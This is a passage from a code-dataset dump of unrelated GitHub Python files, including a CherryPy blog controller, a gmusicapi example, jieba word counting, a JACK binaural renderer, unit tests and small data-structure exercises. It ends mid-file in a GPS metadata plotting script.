isn't a .lyx file\\n\")\r\n f.close()\r\n exit(1)\r\n\r\nf = open(path_to_file, \"w\")\r\ncontents = \"\".join(contents)\r\n#f.writelines(contents) #possible improvement\r\nprint(\"{} was handled successfully \".format(lyx_filename_tail))\r\nf.write(contents)\r\nf.close()\r\n","repo_name":"omer-re/Lyx_fix","sub_path":"lyx_fix3.py","file_name":"lyx_fix3.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38712081505","text":"import cherrypy\nimport json\nfrom datetime import datetime\nfrom components.subcomponents import b64\n\nfrom db import User, Post, session, Media, Like, Comment\n\nfrom components.templater import create_post, posts_list, post_details\nfrom datetime import datetime\n\ndef get_date():\n return datetime.now()\n\nclass Posts:\n @cherrypy.expose\n def index(self):\n if 'username' and 'is_admin' and 'is_authenticated' not in cherrypy.session:\n cherrypy.session['username'] = 'Guest'\n cherrypy.session['is_admin'] = False\n cherrypy.session['is_authenticated'] = False\n print(cherrypy.session['username'])\n all_posts = session.query(Post)\n return posts_list.render(cur_user=cherrypy.session['username'],posts=all_posts)\n \n @cherrypy.expose\n @cherrypy.popargs('id')\n def post(self, id):\n \n if 'username' and 'is_admin' and 'is_authenticated' not in cherrypy.session:\n cherrypy.session['username'] = 'Guest'\n cherrypy.session['is_admin'] = False\n cherrypy.session['is_authenticated'] = False\n \n print(f'Post id: {id}')\n post_obj = session.query(Post).filter(Post.post_id==id).first()\n # print(stuff.title, stuff.post_comments)\n curUser = cherrypy.session['username']\n login_status = cherrypy.session['is_authenticated']\n return post_details.render(postObj=post_obj, cur_user=curUser, userStatus=login_status)\n \n @cherrypy.expose\n def like(self):\n likeData = json.loads(cherrypy.request.body.read())\n 
print(likeData)\n # viewer = session.query(User).filter(User.username==likeData['viewer']).first()\n queryPost = session.query(Post).filter(Post.post_id==likeData['postid']).first()\n \n queryPost.like_action(likeData['viewer'])\n if viewer:\n for like in queryPost.likes:\n if like.user.username == likeData['viewer']:\n session.query(Like).filter(Like.like_id==like.like_id).delete()\n session.commit()\n numLike = {'unlike': len(queryPost.likes)}\n print('Took my like back!')\n return numLike\n \n elif like.user.username != likeData['viewer']:\n newLike = Like(post_id=likeData['postid'], user_id=viewer.user_id, post=queryPost, user=viewer)\n session.add(newLike)\n session.commit()\n \n print(cherrypy.session[\"username\"], ' likes post ', f'{likeData[\"postid\"]}',' by ', f'{queryPost.author.username}')\n print(len(queryPost.likes))\n numLike = {'like': len(queryPost.likes)}\n print('Added a like!')\n return numLike\n else:\n return json.dumps({'err': 'User not logged in'})\n @cherrypy.expose\n def get_likes(self, postid):\n dePost = session.query(Post).filter(Post.post_id==postid).first()\n \n numLike = {'num_likes': len(dePost.likes)}\n \n return json.dumps(numLike)\n \n \n @cherrypy.expose\n def comment(self):\n pdata = json.load(cherrypy.request.body)\n print(pdata['author'])\n if pdata['author'] != 'Guest' or pdata['author'] != '':\n queryAuthor = session.query(User).filter(User.username==pdata['author']).first()\n queryPost = session.query(Post).filter(Post.post_id==pdata['postid']).first()\n newComment = Comment(user_id=queryAuthor.user_id, post_id=queryPost.post_id, user=queryAuthor, post=queryPost, comment=pdata['comment'])\n session.add(newComment)\n session.commit()\n \n else:\n return 'Error commenting'\n \n return 'Success'\n \n @cherrypy.expose \n def create_post(self):\n if 'username' and 'is_authenticated' not in cherrypy.session:\n raise cherrypy.HTTPRedirect('/login')\n \n elif cherrypy.session['username'] == 'Guest' or cherrypy.session['is_authenticated'] == False:\n raise cherrypy.HTTPRedirect('/login')\n \n elif cherrypy.session['username'] != 'Guest' or cherrypy.session['username'] != '':\n curUser = cherrypy.session['username']\n user = session.query(User).filter(User.username==cherrypy.session['username']).first()\n return create_post.render(cur_user=curUser, user=user)\n \n @cherrypy.expose\n @cherrypy.tools.json_in()\n def add_post(self):\n \"\"\"Accepts a dictionary containing post text and image/video file (if any)\"\"\"\n if 'username' and 'is_authenticated' not in cherrypy.session:\n raise cherrypy.HTTPRedirect('/login')\n elif cherrypy.session['username'] == 'Guest' or cherrypy.session['is_authenticated'] == False:\n raise cherrypy.HTTPRedirect('/login')\n \n pdata = cherrypy.request.json\n author = session.query(User).filter(User.username==pdata['author']).first()\n \n if pdata:\n try:\n newpost = Post(content=pdata['writeup'], author=author)\n session.add(newpost)\n session.commit()\n \n lastpost = session.query(Post).filter(Post.content==newpost.content).first()\n file_list = []\n if pdata['media']:\n for file in pdata['media']:\n gPath = 'assets'\n sPath = f'/media/uploads/images/{file[\"name\"]}'\n splitPath = sPath.split('/')\n binPath = f'/media/uploads/bin/{file[\"name\"]}'\n \n print(file['name'])\n \n newImg = b64.decode_file(file, gPath, sPath, binPath)\n \n newfile = Media(\n media_title=file['name'],\n media_path=sPath,\n media_type=file['type'],\n user_id=lastpost.author.user_id,\n post_id=lastpost.post_id,\n 
user=session.query(User).filter(User.user_id==lastpost.user_id).first(), post=lastpost\n )\n session.add(newfile)\n session.commit()\n file_list.append(newfile)\n lastpost.media_attachment=[x for x in file_list]\n except Exception as e:\n print('The error is here', e)\n \n # print(cherrypy.request.json)\n # print(newpost)\n return \"Post Created!\"\n \n @cherrypy.expose\n @cherrypy.tools.json_out()\n def get_media(self, postID):\n postMedia = session.query(Post).filter(Post.post_id==postID).first()\n media_list = []\n for media in postMedia.media_attachment:\n data = open('assets' + media.media_path, 'r')\n mediaData = {\n 'title': media.media_title,\n 'type': media.media_type,\n 'data': data.read(),\n 'post_id': media.post.post_id\n }\n media_list.append(mediaData)\n print(media.media_path)\n \n return media_list\n \n @cherrypy.expose\n @cherrypy.tools.json_out()\n def get_photos(self, userID):\n queryUser = session.query(User).filter(User.user_id==userID).first()\n media_list = []\n for media in queryUser.media:\n data = open('assets' + media.media_path, 'r')\n mediaData = {\n 'title': media.media_title,\n 'type': media.media_type,\n 'data': data.read(),\n 'post_id': media.post.post_id\n }\n media_list.append(mediaData)\n print(media.media_path)\n \n return media_list","repo_name":"Maxprosper22/AVLBlog","sub_path":"components/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"33427829211","text":"#!/usr/bin/env python\n\n\nfrom gmusicapi import Musicmanager\n\n\ndef authenticate():\n \"\"\"Make an instance of the api and attempts to authenticate the user.\n Return the authenticated api.\n \"\"\"\n\n # We are uploading and then downloading so we want Musicmanager\n api = Musicmanager()\n\n # Attempt to authenticate and log in\n logged_in = api.login()\n\n # If login() returns false, you have not performed oauth yet, or did not\n # write your credentials to your disk. Using oauth allows authentication\n # without providing plaintext credentials to the application\n if not logged_in:\n print('No oauth credentials found, please authenticate your account')\n\n # Performs oauth and stores generated credentials to Appdirs \n # 'user_data_dir' by default. oauth only needs to be performed once per \n # machine if the credentials are stored, which is the default behavior.\n authenticated = api.perform_oauth(open_browser=True)\n else:\n print('Successfully logged in.\\n')\n\n return api\n\n\ndef demonstrate():\n \"\"\" Demonstrate some api features. \"\"\"\n\n api = authenticate()\n\n # Demonstrate upload feature.\n # Create a list of one or more file paths of the mp3s you would like \n # to upload\n filepaths = []\n filepaths.append('./song1.mp3')\n\n # Upload an mp3 to your library. upload() returns a tuple of information\n # about the success or failure of uploads\n print(\"Beginning upload...\\n\")\n uploaded = api.upload(filepaths) \n\n # Print all successfully uploaded songs\n if len(uploaded[0]) > 0:\n print(\"Successfully uploaded:\")\n i = 1\n for key in uploaded[0]:\n print(\"%d. %s\" % (i, key))\n i += 1\n\n # Print all unsuccessfully uploaded songs and a description of why\n # songs weren't uploaded\n if len(uploaded[2]) == 0:\n print(\"\\nAll songs successfully uploaded.\")\n else:\n print(\"Not all songs were successfully uploaded:\")\n i = 1\n for key in uploaded[2]:\n print(\"%d. 
%s not uploaded: %s\" % (i, key, uploaded[2][key]))\n i += 1\n\n\n # Demonstrate download feature\n # Get information about songs previously uploaded that are available\n # to be downloaded\n uploaded_songs = api.get_uploaded_songs()\n\n if len(uploaded_songs) == 0:\n print(\"There are no songs currently available for download\")\n else:\n # Print songs that are available for download and store their ids\n # so we can download them\n song_ids = []\n print(\"\\nThe following songs are available for download\")\n for i in range(len(uploaded_songs)):\n song_ids.append(uploaded_songs[i]['id'])\n print(\"%d. %s\" % (i+1, uploaded_songs[i]['title']))\n\n # Download uploaded songs from your library\n print(\"\\nBeginning download...\")\n for i in range(len(song_ids)):\n filename, audio = api.download_song(song_ids[i])\n\n # Write song to disk\n with open(filename, 'wb') as f:\n f.write(audio)\n\n print(\"%d. Written to ./%s\" % (i + 1, filename))\n print(\"\\nDownload complete.\")\n\n # It's good practice to logout when finished\n api.logout()\n\n\nif __name__ == '__main__':\n demonstrate()\n ","repo_name":"simon-weber/gmusicapi","sub_path":"musicmanager_example.py","file_name":"musicmanager_example.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":2498,"dataset":"github-code","pt":"38"} +{"seq_id":"11290867016","text":"import jieba\r\nfrom jieba import analyse\r\nfrom os import path\r\n\r\ncur_path = path.dirname(__file__) # 获取当前脚本路径\r\ntext_path = 'C000008/10.txt' # 设置要分析的文本路径\r\ntext = open(path.join(cur_path, text_path), \"r\").read()\r\ntext = text.rstrip() # 清除文本后边空白符\r\ntext = text[10:] # 清除前边格式内容\r\n\r\n\r\n# input_text : 输入的文本(已经处理好)\r\n# topN : 输出出现次数最高的 N 个词汇的词频,以及与最大词频之比\r\ndef word_freq_count(input_text, topN):\r\n print(\"------此文档:合计有{}个字符------\".format(len(input_text)))\r\n dic = {}\r\n\r\n # jieba 分词\r\n cut_words = jieba.cut(input_text, cut_all=False, HMM=True)\r\n\r\n # 取出分词结果中字长大于 1 的词并统计,统计结果\r\n for word in cut_words:\r\n if len(word) == 1:\r\n continue # 字长为1的去掉\r\n if word in dic:\r\n dic[word] += 1 # 计数加一\r\n else:\r\n dic[word] = 1 # 字典没有则添加\r\n\r\n dic = list(dic.items()) # 将 items() 返回的元组转换为列表\r\n\r\n dic.sort(key=lambda x: x[1], reverse=True) # lambda 对第二维数据排序\r\n\r\n # 输出统计结果\r\n print(\"num words times wf_ratio\")\r\n print(\"----------------------------------------\")\r\n for i in range(topN): # 对出现次数最多的前 topN 个 词汇进行遍历统计\r\n word = dic[i][0] # 被统计词汇\r\n count = dic[i][1] # 词汇出现的次数\r\n wf_ratio = dic[i][1]/dic[0][1] # 词频/最大词频\r\n print(\"{:<5}{:<10}{: ^10}{:>5}\".format(i+1, word, count, wf_ratio))\r\n\r\n\r\nif __name__ == '__main__':\r\n word_freq_count(text, 20) # 统计文本 text 中前 20 个词频最高的词汇的情况\r\n\r\n\r\n","repo_name":"zero1248/tools","sub_path":"python/pkg_test/jieba_test/word_freq_count.py","file_name":"word_freq_count.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13060983852","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 30 18:58:39 2023\r\n\r\n@author: Arya\r\n\"\"\"\r\ndef most_frequent():\r\n print('Enter word as string:',end='')\r\n str1=input()\r\n freq={}\r\n for i in str1:\r\n freq[i]=freq.get(i,0)+1\r\n ordered=sorted(freq,key=freq.get,reverse=True)\r\n print('Frequency of letters entered as string in decending order is:')\r\n for i in ordered:\r\n print(i,'=',freq[i])\r\n 
\r\nmost_frequent()\r\n\r\n","repo_name":"AryaJadhav303/MyCaptain_assignments","sub_path":"Assignment_5_Most frequent.py","file_name":"Assignment_5_Most frequent.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71993411952","text":"\n# coding: utf-8\n\n# In[8]:\n\n\nimport serial\nser = serial.Serial('/dev/tty.usbserial-AH03F9XC') # open serial port\nser.baudrate = 57600 #if other rate it changes to byte mode\n\n\n# In[26]:\n\n\n#load modules\nimport numpy as np\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\ntry:\n import queue # Python 3.x\nexcept ImportError:\n import Queue as queue # Python 2.x\nimport sys\nimport threading\n\n#choose any B-format sound file in FuMa format (Channel order W, X, Y, Z)\nfilename = 'filename.wav'\nclientname = 'file_player'\nbuffersize = 20\nmanual = False\n\nif buffersize < 1:\n parser.error('buffersize must be at least 1')\n\nq = queue.Queue(maxsize=buffersize)\nevent = threading.Event()\n\n\ndef print_error(*args):\n print(*args, file=sys.stderr)\n\n\ndef xrun(delay):\n print_error(\"An xrun occured, increase JACK's period size?\")\n\n\ndef shutdown(status, reason):\n print_error('JACK shutdown!')\n print_error('status:', status)\n print_error('reason:', reason)\n event.set()\n\n\ndef stop_callback(msg=''):\n if msg:\n print_error(msg)\n for port in client.outports:\n port.get_array().fill(0)\n event.set()\n raise jack.CallbackExit\n\n \n \n\ndef process(frames):\n if frames != blocksize:\n stop_callback('blocksize must not be changed, I quit!')\n try:\n data = q.get_nowait()\n except queue.Empty:\n stop_callback('Buffer is empty: increase buffersize?')\n if data is None:\n stop_callback() # Playback is finished\n \n lines = str(ser.read(ser.in_waiting)).split('#') #list with all returned lines from head tracker\n if ',' in lines[-1]:\n yaw = float(lines[-1].split('=')[1].split(',',1)[0])\n else:\n yaw = float(lines[-2].split('=')[1].split(',',1)[0])\n \n if my_buffer.count == 0:\n my_buffer.offset = yaw\n my_buffer.count += 1\n \n angle = -(yaw-my_buffer.offset)\n rad = angle*np.pi/180\n XX = np.sin(rad)*data.T[2,:]+np.cos(rad)*data.T[1,:]\n YY = np.cos(rad)*data.T[2,:]-np.sin(rad)*data.T[1,:]\n \n #print('Angle:',angle)\n \n #spherical speaker array\n D45 = driver_signal(2,70*np.pi/180,np.pi/4,data.T[0,:],YY,data.T[3,:],XX)*20000\n D45_bl_L = np.convolve(D45,L45)\n D45_bl_R = np.convolve(D45,R45)\n D135 = driver_signal(2,115*np.pi/180,3*np.pi/4,data.T[0,:],YY,data.T[3,:],XX)*20000\n D135_bl_L = np.convolve(D135,L135)\n D135_bl_R = np.convolve(D135,R135)\n D225 = driver_signal(2,65*np.pi/180,5*np.pi/4,data.T[0,:],YY,data.T[3,:],XX)*20000\n D225_bl_L = np.convolve(D225,L225)\n D225_bl_R = np.convolve(D225,R225)\n D315 = driver_signal(2,110*np.pi/180,7*np.pi/4,data.T[0,:],YY,data.T[3,:],XX)*20000\n D315_bl_L = np.convolve(D315,L315)\n D315_bl_R = np.convolve(D315,R315)\n \n \n client.outports[0].get_array()[:] = np.hstack((D45_bl_L[0:sizeHRIR-1]+my_buffer.BL45,D45_bl_L[sizeHRIR-1:blocksize]))+np.hstack((D315_bl_L[0:sizeHRIR-1]+my_buffer.BL315,D315_bl_L[sizeHRIR-1:blocksize]))+np.hstack((D135_bl_L[0:sizeHRIR-1]+my_buffer.BL135,D135_bl_L[sizeHRIR-1:blocksize]))+np.hstack((D225_bl_L[0:sizeHRIR-1]+my_buffer.BL225,D225_bl_L[sizeHRIR-1:blocksize])) #assign first channel to out_1\n client.outports[1].get_array()[:] = 
np.hstack((D45_bl_R[0:sizeHRIR-1]+my_buffer.BR45,D45_bl_R[sizeHRIR-1:blocksize]))+np.hstack((D315_bl_R[0:sizeHRIR-1]+my_buffer.BR315,D315_bl_R[sizeHRIR-1:blocksize]))+np.hstack((D135_bl_R[0:sizeHRIR-1]+my_buffer.BR135,D135_bl_R[sizeHRIR-1:blocksize]))+np.hstack((D225_bl_R[0:sizeHRIR-1]+my_buffer.BR225,D225_bl_R[sizeHRIR-1:blocksize])) #assign second channel to out_2\n my_buffer.BL45 = D45_bl_L[blocksize:]\n my_buffer.BR45 = D45_bl_R[blocksize:]\n my_buffer.BL135 = D135_bl_L[blocksize:]\n my_buffer.BR135 = D135_bl_R[blocksize:]\n my_buffer.BL225 = D225_bl_L[blocksize:]\n my_buffer.BR225 = D225_bl_R[blocksize:]\n my_buffer.BL315 = D315_bl_L[blocksize:]\n my_buffer.BR315 = D315_bl_R[blocksize:]\n \n \n \n#determine driver signals according to equation (2.15) in the thesis\n#theta: colatitude, phi: azimuth, R array radius\ndef driver_signal(R,theta,phi,A00,A1min1,A10,A11):\n nm00 = (1/(2*np.pi*R**2))*np.sqrt(1/(4*np.pi))*(1/(4*np.pi))*A00\n nm1min1 = (1/(2*np.pi*R**2))*np.sqrt(3/(4*np.pi))*(np.sin(theta)*np.sin(phi)/(4*np.pi))*A1min1\n nm10 = (1/(2*np.pi*R**2))*np.sqrt(3/(4*np.pi))*(np.cos(theta)/(4*np.pi))*A10\n nm11 = (1/(2*np.pi*R**2))*np.sqrt(3/(4*np.pi))*(np.sin(theta)*np.cos(phi)/(4*np.pi))*A11\n return nm00+nm1min1+nm10+nm11\n\n#Import HRTF data from Matlab file\nimport scipy.io as sio\nmat_content = sio.loadmat('HRTF_nh163.mat')\n\n\nL45 = mat_content['aaL441_eq'].flatten() #left ear HRIR for loudspeaker at 45 degree azimuth\nR45 = mat_content['aaR441_eq'].flatten() #right ear ...\nL135 = mat_content['bbL441_eq'].flatten()\nR135 = mat_content['bbR441_eq'].flatten()\nL225 = mat_content['ccL441_eq'].flatten()\nR225 = mat_content['ccR441_eq'].flatten()\nL315 = mat_content['ddL441_eq'].flatten()\nR315 = mat_content['ddR441_eq'].flatten()\n \nsizeHRIR = len(L45)\n\nclass buff:\n pass\n \n#instance of class buff\nmy_buffer = buff()\n\nmy_buffer.count = 0\nmy_buffer.offset = 0\nmy_buffer.BL45 = np.zeros(len(L45)-1)\nmy_buffer.BR45 = np.zeros(len(L45)-1)\nmy_buffer.BL135 = np.zeros(len(L45)-1)\nmy_buffer.BR135 = np.zeros(len(L45)-1)\nmy_buffer.BL225 = np.zeros(len(L45)-1)\nmy_buffer.BR225 = np.zeros(len(L45)-1)\nmy_buffer.BL315 = np.zeros(len(L45)-1)\nmy_buffer.BR315 = np.zeros(len(L45)-1)\n\n#clean buffer (fixed to 1020 bytes length) and queue with old data occuring between two calls of this script\nwhile ser.in_waiting == 1020:\n clean_buffer = ser.read(ser.in_waiting)\n #print('cleaning') \n \n \ntry:\n import jack\n import soundfile as sf\n \n client = jack.Client(clientname)\n\n \n blocksize = client.blocksize\n samplerate = client.samplerate\n client.set_xrun_callback(xrun)\n client.set_shutdown_callback(shutdown)\n client.set_process_callback(process)\n \n with sf.SoundFile(filename) as f:\n for ch in range(2):\n client.outports.register('out_{0}'.format(ch + 1))\n block_generator = f.blocks(blocksize=blocksize, dtype='float32',\n always_2d=True, fill_value=0)\n for _, data in zip(range(buffersize), block_generator):\n q.put_nowait(data) # Pre-fill queue\n with client:\n if not manual:\n target_ports = client.get_ports(is_physical=True, is_input=True, is_audio=True)\n if len(client.outports) == 1 and len(target_ports) > 1:\n # Connect mono file to stereo output\n client.outports[0].connect(target_ports[0])\n client.outports[0].connect(target_ports[1])\n else:\n for source, target in zip(client.outports, target_ports):\n source.connect(target)\n timeout = blocksize * buffersize / samplerate\n for data in block_generator:\n q.put(data, timeout=timeout)\n q.put(None, timeout=timeout) # 
Signal end of file\n event.wait() # Wait until playback is finished\nexcept KeyboardInterrupt:\n print('\\nInterrupted by user')\nexcept (queue.Full):\n # A timeout occured, i.e. there was an error in the callback\n parser.exit(1)\nexcept Exception as e:\n parser.exit(type(e).__name__ + ': ' + str(e))\n\n","repo_name":"kilian-schufo/B-Format-masters-thesis","sub_path":"Binaural_Renderer.py","file_name":"Binaural_Renderer.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"29126008171","text":"from ..error import SLValueError\nfrom types import NoneType\n\nTYPE_TO_STRING_TABLE = {\n str: \"str\",\n int: \"int\",\n float: \"float\",\n bool: \"bool\",\n list: \"array\",\n NoneType: \"none\",\n}\n\n\nclass TypeBuiltins:\n def type(self, value):\n return TYPE_TO_STRING_TABLE[type(value)]\n\n def to_int(self, value):\n try:\n return int(value)\n except ValueError:\n return SLValueError(\n self.context, \"argument 'value' cannot be converted to int\"\n )\n\n def to_float(self, value):\n try:\n return float(value)\n except ValueError:\n return SLValueError(\n self.context, \"argument 'value' cannot be converted to float\"\n )\n\n def to_bool(self, value):\n try:\n return bool(value)\n except ValueError:\n return SLValueError(\n self.context, \"argument 'value' cannot be converted to bool\"\n )\n\n def to_string(self, value):\n return self._print([value])\n","repo_name":"sertdfyguhi/shitlang","sub_path":"shitlang/builtins/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"16999485421","text":"import time\nimport unittest\n\nimport numpy as np\n\nfrom ai4water import Model\nfrom ai4water.datasets import busan_beach\nfrom ai4water.postprocessing.explain import PermutationImportance\n\n\ndata=busan_beach()\n\nclass TestPermImportance(unittest.TestCase):\n\n def test_one_2d_input(self):\n model = Model(model=\"XGBRegressor\", verbosity=0)\n model.fit(data=data)\n x_val, y_val = model.validation_data()\n\n pimp = PermutationImportance(\n model.predict,\n x_val,\n y_val.reshape(-1,))\n fig = pimp.plot_1d_pimp(show=False)\n assert fig.__class__.__name__ == \"AxesSubplot\"\n fig = pimp.plot_1d_pimp(show=False, plot_type=\"bar_chart\")\n assert fig.__class__.__name__ == \"AxesSubplot\"\n\n return\n\n def test_one_3d_input(self):\n time.sleep(1)\n beach_data = data\n model = Model(\n model={\"layers\": {\n \"LSTM\": 32,\n \"Dense\": 1\n }},\n input_features=beach_data.columns.tolist()[0:-1],\n output_features=beach_data.columns.tolist()[-1:],\n ts_args={\"lookback\": 5},\n verbosity=0\n )\n\n model.fit(data=beach_data)\n\n x, y = model.training_data()\n\n pimp = PermutationImportance(model.predict, inputs=x, target=y.reshape(-1, ),\n n_repeats=4,\n verbose=False)\n axes = pimp.plot_as_heatmap(annotate=False, show=False)\n assert axes.__class__.__name__ == \"AxesSubplot\"\n\n pimp.plot_1d_pimp(show=False)\n\n return\n\n def test_two_3d_input(self):\n model = Model(\n model={\"layers\": {\n \"Input_0\": {\"shape\": (5, 4)},\n \"Input_1\": {\"shape\": (5, 3)},\n \"Concatenate\": {\"config\": {\"name\": \"Concat\"},\n \"inputs\": [\"Input_0\", \"Input_1\"]},\n \"LSTM\": 32,\n \"Dense\": 1\n }},\n verbosity=0\n )\n\n x1 = np.random.random((100, 5, 4))\n x2 = np.random.random((100, 5, 3))\n pimp = PermutationImportance(model.predict, [x1, x2], np.random.random((100, 1)), 
verbose=0)\n assert len(pimp.importances) == 2\n assert len(pimp.importances[0]) == 5\n assert len(pimp.importances[1]) == 5\n return\n\n def test_one_2d_and_one_3d_input(self):\n model = Model(\n model={\"layers\": {\n \"Input_0\": {\"shape\": (5, 4)},\n \"LSTM\": {\"config\": 32,\n \"inputs\": \"Input_0\"},\n\n \"Input_1\": {\"shape\": (4,)},\n \"Dense_0\": {\"config\": 8,\n \"inputs\": \"Input_1\"},\n\n \"Concatenate\": {\"config\": {\"name\": \"Concat\"},\n \"inputs\": [\"LSTM\", \"Dense_0\"]},\n \"Dense\": 1\n }},\n verbosity=0,\n )\n\n x1 = np.random.random((100, 5, 4))\n x2 = np.random.random((100, 4))\n pimp = PermutationImportance(model.predict, [x1, x2], np.random.random((100, 1)), verbose=0)\n assert len(pimp.importances) == 2\n assert len(pimp.importances[0]) == 5\n assert pimp.importances[1].shape == (4, 14)\n return\n\n def test_two_2d_inputs(self):\n model = Model(model={\"layers\": {\n \"Input_0\": {\"shape\": (5,)},\n \"Input_1\": {\"shape\": (3,)},\n \"Concatenate\": {\"config\": {\"name\": \"Concat\"},\n \"inputs\": [\"Input_0\", \"Input_1\"]},\n \"Dense_0\": {\"config\": 8,\n \"inputs\": \"Concat\"},\n \"Dense_1\": 1}},\n ts_args={'lookback':1},\n verbosity=0\n )\n x1 = np.random.random((100, 5))\n x2 = np.random.random((100, 3))\n pimp = PermutationImportance(model.predict, [x1, x2], np.random.random((100, 1)), verbose=0)\n fig = pimp.plot_1d_pimp(show=False)\n\n assert fig.__class__.__name__ == \"AxesSubplot\"\n return\n\nif __name__ == \"__main__\":\n\n unittest.main()\n","repo_name":"lyh910926/AI4Water","sub_path":"tests/test_postprocessing/test_perm_imp.py","file_name":"test_perm_imp.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"4951077795","text":"class Node:\n def __init__(self, value, next = None, previous = None):\n self.value = value\n self.next = next\n self.previous = previous\n \n\nclass DList:\n\n def __init__(self) :\n self.header = None\n \n \n\n def add_to_front(self, value):\n newNode = Node(value)\n \n if self.header == None:\n self.header = newNode\n return self\n \n \n newNode.next = self.header\n self.header.previous = newNode\n self.header = newNode\n\n return self\n \n def print_values(self):\n runner = self.header\n while runner != None:\n print (runner.value)\n runner = runner.next\n \n def add_to_back(self, value):\n newNode = Node(value)\n\n if self.header == None:\n self.header = newNode\n return self\n \n runner = self.header\n\n while runner.next != None:\n runner = runner.next\n \n newNode.previous = runner\n runner.next = newNode\n return self\n\n def add_value_by_index(self, value, index): \n newNode = Node(value)\n if self.header == None:\n self.header = newNode\n return self\n \n runner = self.header\n i = 0\n\n while index != i:\n runner = runner.next\n i +=1\n if runner == None and i != index:\n print('index not found')\n return self\n\n if runner == None:\n self.add_to_back(newNode.value)\n return self\n else:\n newNode.next = runner\n newNode.previous = runner.previous\n runner.previous = newNode\n newNode.previous.next = newNode\n return self\n\n \n\n\n\n\n\n\n\n \n\n\nmyList = DList()\n\n# myList.add_to_front(12)\n# myList.add_to_front(10)\nmyList.add_to_back(\"back\")\nmyList.add_to_front(\"front\")\nmyList.add_value_by_index(\"Middle\",2)\nmyList.print_values()\n \n \n\n 
\n","repo_name":"reubencj/python-stack","sub_path":"fundamentals/extras/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72417717230","text":"#상하좌우 문제\r\n\r\n#n 입력 받기\r\nn= int(input())\r\n\r\nx,y=1,1\r\n\r\nplans = input().split()\r\n\r\n#L,R,U,D에 따른 이동 방향\r\ndx=[0,0,-1,1]\r\ndy=[-1,1,0,0]\r\n\r\nmove_types = ['L','R','U','D']\r\n\r\n#이동계획\r\nfor plan in plans:\r\n #이동후 좌표 구하기\r\n for i in range(len(move_types)):\r\n if plan == move_types[i]:\r\n nx = x +dx[i]\r\n ny = y+ dy[i]\r\n #공간 벗어나는 경우 무시\r\n if nx < 1 or ny < 1 or nx > n or ny > n:\r\n continue\r\n #이동수행\r\n x,y = nx,ny\r\n\r\nprint(x,y)\r\n","repo_name":"goodpinokio/Data_Structure-Python-","sub_path":"문제/problem(1_i).py","file_name":"problem(1_i).py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"5891786848","text":"def moyenne(tab: list) -> float: # similaire au sujet 28\r\n \"\"\"\r\n moyenne(list) -> float\r\n Entrée : un tableau non vide d'entiers\r\n Sortie : nombre de type float\r\n Correspondant à la moyenne des valeurs présentes dans le\r\n tableau\r\n \"\"\"\r\n assert type(tab) == list and tab != [], \"tab doit etre un tableau non vide\"\r\n # solution facile : return sum(tab) / len(tab)\r\n total = 0\r\n for element in tab:\r\n total += element\r\n return total / len(tab)\r\n\r\n\r\ndef dichotomie(tab, x):\r\n \"\"\"\r\n tab : tableau trie dans l'ordre croissant\r\n x : nombre entier\r\n La fonction renvoie True si tab contient x et False sinon\r\n \"\"\"\r\n # cas du tableau vide\r\n if tab == []:\r\n return False, 1\r\n\r\n # cas ou x n'est pas compris entre les valeurs extremes\r\n if (x < tab[0]) or (x > tab[-1]):\r\n return False, 2\r\n\r\n debut = 0\r\n fin = len(tab) - 1\r\n while debut <= fin:\r\n m = (debut + fin) // 2 # milieu\r\n if x == tab[m]:\r\n return True\r\n if x > tab[m]:\r\n debut = m + 1\r\n else:\r\n fin = m - 1\r\n return False, 3 # troisieme cas renvoyant False","repo_name":"emsquid/epreuves-pratiques-nsi","sub_path":"Sujet 35/22-NSI-35.py","file_name":"22-NSI-35.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"fr","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"29825771256","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits import mplot3d\n\ndef parse_location(tgt_dir):\n\n # location_list = np.empty((0,2), dtype=np.float64)\n location_list = []\n all_location = sorted(os.listdir(tgt_dir))\n\n for loc in all_location:\n hold_arr = []\n for line in open(loc):\n if 'longitude' in line:\n splitval = line.split(sep='\\\"')\n float_split_long = float(splitval[3])\n hold_arr.append(float_split_long)\n\n if 'latitude' in line:\n splitval = line.split('\\\"')\n float_split_lat = float(splitval[3])\n hold_arr.append(float_split_lat)\n\n if 'altitude' in line:\n splitval = line.split('\\\"')\n float_split_alt = float(splitval[3])\n # hold_arr.append(float_split_alt)\n hold_arr.append(60.0)\n # print(hold_arr[0], \",\", hold_arr[1])\n location_list.append(hold_arr)\n\n return location_list\n\ncurrentPath = os.getcwd()\ndatadir = currentPath + '/sample_metadata'\n\nprint(datadir)\nos.chdir(datadir)\nlocation_list = parse_location(datadir)\n\nnp_loc_list = np.array(location_list, dtype=np.float64)\n\nprint(np_loc_list.shape)\n\nfig = plt.figure()\nax 
